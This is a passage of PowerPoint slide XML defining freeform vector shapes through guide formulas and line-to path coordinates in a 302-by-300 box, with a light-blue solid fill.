                  <a:gd name="T23" fmla="*/ 12 h 300"/>
                  <a:gd name="T24" fmla="*/ 156 w 302"/>
                  <a:gd name="T25" fmla="*/ 21 h 300"/>
                  <a:gd name="T26" fmla="*/ 169 w 302"/>
                  <a:gd name="T27" fmla="*/ 9 h 300"/>
                  <a:gd name="T28" fmla="*/ 184 w 302"/>
                  <a:gd name="T29" fmla="*/ 9 h 300"/>
                  <a:gd name="T30" fmla="*/ 204 w 302"/>
                  <a:gd name="T31" fmla="*/ 7 h 300"/>
                  <a:gd name="T32" fmla="*/ 211 w 302"/>
                  <a:gd name="T33" fmla="*/ 0 h 300"/>
                  <a:gd name="T34" fmla="*/ 228 w 302"/>
                  <a:gd name="T35" fmla="*/ 6 h 300"/>
                  <a:gd name="T36" fmla="*/ 245 w 302"/>
                  <a:gd name="T37" fmla="*/ 10 h 300"/>
                  <a:gd name="T38" fmla="*/ 256 w 302"/>
                  <a:gd name="T39" fmla="*/ 18 h 300"/>
                  <a:gd name="T40" fmla="*/ 270 w 302"/>
                  <a:gd name="T41" fmla="*/ 18 h 300"/>
                  <a:gd name="T42" fmla="*/ 277 w 302"/>
                  <a:gd name="T43" fmla="*/ 13 h 300"/>
                  <a:gd name="T44" fmla="*/ 295 w 302"/>
                  <a:gd name="T45" fmla="*/ 31 h 300"/>
                  <a:gd name="T46" fmla="*/ 296 w 302"/>
                  <a:gd name="T47" fmla="*/ 49 h 300"/>
                  <a:gd name="T48" fmla="*/ 300 w 302"/>
                  <a:gd name="T49" fmla="*/ 56 h 300"/>
                  <a:gd name="T50" fmla="*/ 278 w 302"/>
                  <a:gd name="T51" fmla="*/ 78 h 300"/>
                  <a:gd name="T52" fmla="*/ 276 w 302"/>
                  <a:gd name="T53" fmla="*/ 98 h 300"/>
                  <a:gd name="T54" fmla="*/ 271 w 302"/>
                  <a:gd name="T55" fmla="*/ 110 h 300"/>
                  <a:gd name="T56" fmla="*/ 263 w 302"/>
                  <a:gd name="T57" fmla="*/ 126 h 300"/>
                  <a:gd name="T58" fmla="*/ 270 w 302"/>
                  <a:gd name="T59" fmla="*/ 141 h 300"/>
                  <a:gd name="T60" fmla="*/ 271 w 302"/>
                  <a:gd name="T61" fmla="*/ 165 h 300"/>
                  <a:gd name="T62" fmla="*/ 278 w 302"/>
                  <a:gd name="T63" fmla="*/ 191 h 300"/>
                  <a:gd name="T64" fmla="*/ 288 w 302"/>
                  <a:gd name="T65" fmla="*/ 217 h 300"/>
                  <a:gd name="T66" fmla="*/ 258 w 302"/>
                  <a:gd name="T67" fmla="*/ 233 h 300"/>
                  <a:gd name="T68" fmla="*/ 255 w 302"/>
                  <a:gd name="T69" fmla="*/ 268 h 300"/>
                  <a:gd name="T70" fmla="*/ 268 w 302"/>
                  <a:gd name="T71" fmla="*/ 283 h 300"/>
                  <a:gd name="T72" fmla="*/ 278 w 302"/>
                  <a:gd name="T73" fmla="*/ 280 h 300"/>
                  <a:gd name="T74" fmla="*/ 276 w 302"/>
                  <a:gd name="T75" fmla="*/ 300 h 300"/>
                  <a:gd name="T76" fmla="*/ 257 w 302"/>
                  <a:gd name="T77" fmla="*/ 287 h 300"/>
                  <a:gd name="T78" fmla="*/ 242 w 302"/>
                  <a:gd name="T79" fmla="*/ 279 h 300"/>
                  <a:gd name="T80" fmla="*/ 229 w 302"/>
                  <a:gd name="T81" fmla="*/ 277 h 300"/>
                  <a:gd name="T82" fmla="*/ 210 w 302"/>
                  <a:gd name="T83" fmla="*/ 272 h 300"/>
                  <a:gd name="T84" fmla="*/ 195 w 302"/>
                  <a:gd name="T85" fmla="*/ 267 h 300"/>
                  <a:gd name="T86" fmla="*/ 177 w 302"/>
                  <a:gd name="T87" fmla="*/ 259 h 300"/>
                  <a:gd name="T88" fmla="*/ 158 w 302"/>
                  <a:gd name="T89" fmla="*/ 261 h 300"/>
                  <a:gd name="T90" fmla="*/ 157 w 302"/>
                  <a:gd name="T91" fmla="*/ 245 h 300"/>
                  <a:gd name="T92" fmla="*/ 153 w 302"/>
                  <a:gd name="T93" fmla="*/ 227 h 300"/>
                  <a:gd name="T94" fmla="*/ 150 w 302"/>
                  <a:gd name="T95" fmla="*/ 208 h 300"/>
                  <a:gd name="T96" fmla="*/ 140 w 302"/>
                  <a:gd name="T97" fmla="*/ 202 h 300"/>
                  <a:gd name="T98" fmla="*/ 131 w 302"/>
                  <a:gd name="T99" fmla="*/ 196 h 300"/>
                  <a:gd name="T100" fmla="*/ 116 w 302"/>
                  <a:gd name="T101" fmla="*/ 203 h 300"/>
                  <a:gd name="T102" fmla="*/ 99 w 302"/>
                  <a:gd name="T103" fmla="*/ 212 h 300"/>
                  <a:gd name="T104" fmla="*/ 79 w 302"/>
                  <a:gd name="T105" fmla="*/ 207 h 300"/>
                  <a:gd name="T106" fmla="*/ 69 w 302"/>
                  <a:gd name="T107" fmla="*/ 181 h 300"/>
                  <a:gd name="T108" fmla="*/ 56 w 302"/>
                  <a:gd name="T109" fmla="*/ 179 h 300"/>
                  <a:gd name="T110" fmla="*/ 29 w 302"/>
                  <a:gd name="T111" fmla="*/ 179 h 300"/>
                  <a:gd name="T112" fmla="*/ 12 w 302"/>
                  <a:gd name="T113" fmla="*/ 180 h 300"/>
                  <a:gd name="T114" fmla="*/ 0 w 302"/>
                  <a:gd name="T115" fmla="*/ 176 h 300"/>
                  <a:gd name="T116" fmla="*/ 6 w 302"/>
                  <a:gd name="T117" fmla="*/ 167 h 300"/>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302"/>
                  <a:gd name="T178" fmla="*/ 0 h 300"/>
                  <a:gd name="T179" fmla="*/ 302 w 302"/>
                  <a:gd name="T180" fmla="*/ 300 h 300"/>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302" h="300">
                    <a:moveTo>
                      <a:pt x="13" y="160"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="16" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="160"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36400" name="Freeform 132"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2933" y="2859"/>
                <a:ext cx="302" cy="300"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 21 w 302"/>
                  <a:gd name="T1" fmla="*/ 161 h 300"/>
                  <a:gd name="T2" fmla="*/ 34 w 302"/>
                  <a:gd name="T3" fmla="*/ 161 h 300"/>
                  <a:gd name="T4" fmla="*/ 50 w 302"/>
                  <a:gd name="T5" fmla="*/ 151 h 300"/>
                  <a:gd name="T6" fmla="*/ 60 w 302"/>
                  <a:gd name="T7" fmla="*/ 133 h 300"/>
                  <a:gd name="T8" fmla="*/ 67 w 302"/>
                  <a:gd name="T9" fmla="*/ 110 h 300"/>
                  <a:gd name="T10" fmla="*/ 83 w 302"/>
                  <a:gd name="T11" fmla="*/ 98 h 300"/>
                  <a:gd name="T12" fmla="*/ 88 w 302"/>
                  <a:gd name="T13" fmla="*/ 75 h 300"/>
                  <a:gd name="T14" fmla="*/ 93 w 302"/>
                  <a:gd name="T15" fmla="*/ 46 h 300"/>
                  <a:gd name="T16" fmla="*/ 100 w 302"/>
                  <a:gd name="T17" fmla="*/ 29 h 300"/>
                  <a:gd name="T18" fmla="*/ 101 w 302"/>
                  <a:gd name="T19" fmla="*/ 18 h 300"/>
                  <a:gd name="T20" fmla="*/ 113 w 302"/>
                  <a:gd name="T21" fmla="*/ 4 h 300"/>
                  <a:gd name="T22" fmla="*/ 127 w 302"/>
                  <a:gd name="T23" fmla="*/ 12 h 300"/>
                  <a:gd name="T24" fmla="*/ 156 w 302"/>
                  <a:gd name="T25" fmla="*/ 21 h 300"/>
                  <a:gd name="T26" fmla="*/ 169 w 302"/>
                  <a:gd name="T27" fmla="*/ 9 h 300"/>
                  <a:gd name="T28" fmla="*/ 184 w 302"/>
                  <a:gd name="T29" fmla="*/ 9 h 300"/>
                  <a:gd name="T30" fmla="*/ 204 w 302"/>
                  <a:gd name="T31" fmla="*/ 7 h 300"/>
                  <a:gd name="T32" fmla="*/ 211 w 302"/>
                  <a:gd name="T33" fmla="*/ 0 h 300"/>
                  <a:gd name="T34" fmla="*/ 228 w 302"/>
                  <a:gd name="T35" fmla="*/ 6 h 300"/>
                  <a:gd name="T36" fmla="*/ 245 w 302"/>
                  <a:gd name="T37" fmla="*/ 10 h 300"/>
                  <a:gd name="T38" fmla="*/ 256 w 302"/>
                  <a:gd name="T39" fmla="*/ 18 h 300"/>
                  <a:gd name="T40" fmla="*/ 270 w 302"/>
                  <a:gd name="T41" fmla="*/ 18 h 300"/>
                  <a:gd name="T42" fmla="*/ 277 w 302"/>
                  <a:gd name="T43" fmla="*/ 13 h 300"/>
                  <a:gd name="T44" fmla="*/ 295 w 302"/>
                  <a:gd name="T45" fmla="*/ 31 h 300"/>
                  <a:gd name="T46" fmla="*/ 296 w 302"/>
                  <a:gd name="T47" fmla="*/ 49 h 300"/>
                  <a:gd name="T48" fmla="*/ 300 w 302"/>
                  <a:gd name="T49" fmla="*/ 56 h 300"/>
                  <a:gd name="T50" fmla="*/ 278 w 302"/>
                  <a:gd name="T51" fmla="*/ 78 h 300"/>
                  <a:gd name="T52" fmla="*/ 276 w 302"/>
                  <a:gd name="T53" fmla="*/ 98 h 300"/>
                  <a:gd name="T54" fmla="*/ 271 w 302"/>
                  <a:gd name="T55" fmla="*/ 110 h 300"/>
                  <a:gd name="T56" fmla="*/ 263 w 302"/>
                  <a:gd name="T57" fmla="*/ 126 h 300"/>
                  <a:gd name="T58" fmla="*/ 270 w 302"/>
                  <a:gd name="T59" fmla="*/ 141 h 300"/>
                  <a:gd name="T60" fmla="*/ 271 w 302"/>
                  <a:gd name="T61" fmla="*/ 165 h 300"/>
                  <a:gd name="T62" fmla="*/ 278 w 302"/>
                  <a:gd name="T63" fmla="*/ 191 h 300"/>
                  <a:gd name="T64" fmla="*/ 288 w 302"/>
                  <a:gd name="T65" fmla="*/ 217 h 300"/>
                  <a:gd name="T66" fmla="*/ 258 w 302"/>
                  <a:gd name="T67" fmla="*/ 233 h 300"/>
                  <a:gd name="T68" fmla="*/ 255 w 302"/>
                  <a:gd name="T69" fmla="*/ 268 h 300"/>
                  <a:gd name="T70" fmla="*/ 268 w 302"/>
                  <a:gd name="T71" fmla="*/ 283 h 300"/>
                  <a:gd name="T72" fmla="*/ 278 w 302"/>
                  <a:gd name="T73" fmla="*/ 280 h 300"/>
                  <a:gd name="T74" fmla="*/ 276 w 302"/>
                  <a:gd name="T75" fmla="*/ 300 h 300"/>
